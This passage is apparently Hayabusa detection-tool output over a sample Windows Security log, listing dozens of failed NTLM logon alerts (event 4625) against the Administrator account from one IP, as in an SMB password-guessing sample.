+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: 